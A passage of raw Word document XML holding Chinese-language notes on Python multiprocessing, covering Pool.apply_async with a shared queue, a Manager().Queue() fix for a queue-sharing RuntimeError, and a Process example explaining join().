        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i in targetPaths['gitpaths']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A89BBE7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        q.put(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA560D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>队列数量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: " + str(q.qsize()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC3EEFE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB43794" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    pool = Pool(10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C4F02C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i in range(10):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3EA5CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        pool.apply_async(execTarget, args=(q, int(targetPaths['entrophy']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216B4679" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    pool.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7B4ED3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    pool.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348BB757" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F055168" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apply_async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改为如下，看到报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A10E397" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(pool.apply_async(execTarget, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="660099"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">=(q, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(targetPaths[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'entrophy'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>]))).get())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F7E568" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2528A08C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="546" w:name="OLE_LINK20"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果遇到问题如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A3E591" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>RuntimeError: Queue objects should only be shared between processes through inheritance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AAA2D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21354681" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解决方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DE9224" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="default"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="default"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>manager = multiprocessing.Manager()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C99294C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="default"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="default"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>queue = manager.Queue()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD2279D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="546"/>
    <w:p w14:paraId="6B46BE86" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14080AB3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="138F3DC9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="794209CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="547" w:name="_Toc159779980"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建多进程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="547"/>
    </w:p>
    <w:p w14:paraId="757F101B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from collections import deque</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2699C7C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from multiprocessing import Queue, Process, Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749213C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="230CB39F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def Thread_1():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3953B2CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFF4CB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F2F1E6A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def Thread_2():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAE8DBE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C808591" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7990F9D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def Process_1(signal_CLEAN_FREEDISK):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CCC794" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    while signal_CLEAN_FREEDISK.qsize()&gt;0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50114DF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("P1: ", signal_CLEAN_FREEDISK.get())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E89E00" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71023259" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def Process_2(signal_CLEAN_FREEDISK):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C52840D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    while signal_CLEAN_FREEDISK.qsize()&gt;0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A0F384" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("P2: ", signal_CLEAN_FREEDISK.get())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAACE1E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CB23376" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6CF230" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D93D762" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBA8A10" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4F823F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主函数入口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B447D3D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    global signal_CLEAN_FREEDISK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D85322C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    signal_CLEAN_FREEDISK = Queue()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E2B7D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i in range(50):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B3CEF4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        signal_CLEAN_FREEDISK.put(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32175FA7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_1 = Process(target=Process_1, args=(signal_CLEAN_FREEDISK,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BD4A8E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_2 = Process(target=Process_1, args=(signal_CLEAN_FREEDISK,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E20EF8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_3 = Process(target=Process_2, args=(signal_CLEAN_FREEDISK,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4064EA5B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_1.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7F699D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_2.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0503B3F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_3.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1B84A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_1.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBD2C40" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_2.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5057599B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>clean_freedisk_flag_process_3.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42157EA7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>join()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>会等待执行完毕，不适用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>join()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>则会让他自己执行，但是不会等待执行完毕，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>后瞬间执行后面的程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA8A35C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完毕</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598FE054" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F9DE388" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="672EE39F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CDF377C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="548" w:name="_Toc159779981"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多线程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="548"/>
    </w:p>
    <w:p w14:paraId="6A605906" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D44383D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
